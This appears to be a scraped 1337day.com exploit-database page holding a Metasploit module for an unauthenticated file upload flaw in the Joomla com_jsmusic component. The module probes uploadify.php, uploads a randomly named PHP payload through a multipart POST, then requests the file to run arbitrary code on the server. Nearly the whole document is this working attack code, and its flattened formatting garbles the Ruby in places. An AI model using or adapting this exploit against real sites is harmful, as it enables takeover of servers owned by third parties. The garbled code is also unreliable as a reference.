|
Joomla Component com_jsmusic File Upload Vulnerabi
Joomla Component com_jsmusic File Upload Vulnerabi
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=## _ __ __ __ ## /' __ /'__` / __ /'__` ## /_, ___ /_/_ ___ ,_/ / _ ___ ## /_/ /' _ ` / /_/__<_ /'___ / /`'__ ## / / / / __/ _ _ / ## _ _ __ ____/ ____ __ ____/ _ ## /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ ## ____/ >> Exploit database separated by exploit ## /___/ type (local, remote, DoS, etc.) ## ## [+] Site : 1337day.com ## [+] Support e-mail : submit[at]1337day.com ## ## ######################################### ## I'm The Black Devils member from Inj3ct0r Team ## ######################################### ##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#### This Exploit must be use in Metasploit Framework # This module created by The Black Devils##require 'msf/core'require 'msf/core/exploit/php_exe'class Metasploit3 < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::PhpEXEdef initialize(info = {})super(update_info(info,'Name' => 'Joomla com_jsmusic File Upload Vulnerability','Description' => %q{This module exploits a vulnerability found in Joomla com_jsmusicComponent. By abusing the uploadify.php file, a malicious user can upload a file to atemp directory without authentication, which results in arbitrary code execution.},'Author' =>['Zikou-16', # initial discovery],'License' => MSF_LICENSE,'References' =>[[ 'OSVDB', '82656' ],[ 'BID', '53787' ],[ 'EDB', '18987'],],'Payload' =>{'BadChars' => "�",},'Platform' => 'php','Arch' => ARCH_PHP,'Targets' =>[[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]],'DefaultTarget' => 0,'DisclosureDate' => 'Mar 26 2012'))register_options([OptString.new('TARGETURI', [true, 'The full URI path to JOOMLA', '/JOOMLA'])], self.class)enddef checkuri = target_uri.pathuri << '/' if uri[-1,1] != '/'res = send_request_cgi({'method' => 'GET','uri' => "#{uri}components/com_jsmusic/js/uploadify/uploadify.php"})if not res or res.code != 200return Exploit::CheckCode::Unknownendreturn Exploit::CheckCode::Appearsenddef exploituri = target_uri.pathuri << '/' if uri[-1,1] != '/'peer = "#{rhost}:#{rport}"@payload_name = "#{rand_text_alpha(5)}.php"php_payload = get_write_exec_payload(:unlink_self=>true)data = Rex::MIME::Message.newdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name="Filedata"; filename="#{@payload_name}"")data.add_part("#{uri}components/com_jsmusic/js/uploadify/", nil, nil, "form-data; name="folder"")post_data = data.to_s.gsub(/^
--_Part_/, '--_Part_')print_status("#{peer} - Uploading payload #{@payload_name}")res = send_request_cgi({'method' => 'POST','uri' => "#{uri}components/com_jsmusic/js/uploadify/uploadify.php",'ctype' => "multipart/form-data; boundary=#{data.bound}",'data' => post_data})if not res or res.code != 200 or res.body !~ /#{@payload_name}/fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")endupload_uri = res.bodyprint_status("#{peer} - Executing payload #{@payload_name}")res = send_request_raw({'uri' => upload_uri,'method' => 'GET'})endend# 8541DB1351CC326C 1337day.com [2013-02-02] D90E962485E75BD5 #